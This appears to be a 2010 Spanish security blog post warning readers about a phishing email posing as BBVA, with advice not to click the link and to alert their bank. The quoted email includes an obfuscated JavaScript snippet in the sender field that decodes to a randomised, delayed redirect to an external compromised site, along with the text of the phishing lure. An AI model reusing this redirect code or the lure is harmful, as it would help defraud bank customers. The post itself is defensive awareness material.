Otro phishing bancario !, esta vez aparenta ser del BBVA

Cada día se reciben mails similares, pero no por ello se ha de bajar la guardia !!!

El que está llegando hoy reza así

____________

——– Mensaje original ——– Asunto:  Cuenta desactivada
Fecha:  Sun, 12 Sep 2010 21:26:05 -0400
De:  BBVA net <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sat@satinfo.es”><destinatario>

BBVA net
Notificación: Cuenta Desactivada

      Su cuenta permaneció inactiva las ultimas horas, teniendo problemas constantemente para la conexión por lo cual nuestro Centro de Seguridad decidió proteger su privacidad desactivando su bandeja de entrada de forma que su información se mantenga guardada.
      Para reactivar su cuenta haga clic en:

Activar Cuenta     <—–  link malicioso, enlaza con una web de Israel…

Banco Bilbao Vizcaya Argentaria S.A. – 2010

____________

Como siempre, no pulsar en links de mails no solicitados, ni de webs desconocidas o aparecidas involuntariamente.

Info sobre la IP a la que enlaza el indicado mail malicioso .

 Afortunadamente, en esta ocasión parece que el acceso a la misma ya ha sido desactivado, pero si lo recibieron, pulsaron en dicho link y contestaron las preguntas…  mejor que no ! pero si fue el caso, avisen a su banco !!!

saludos

ms, 14-9-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies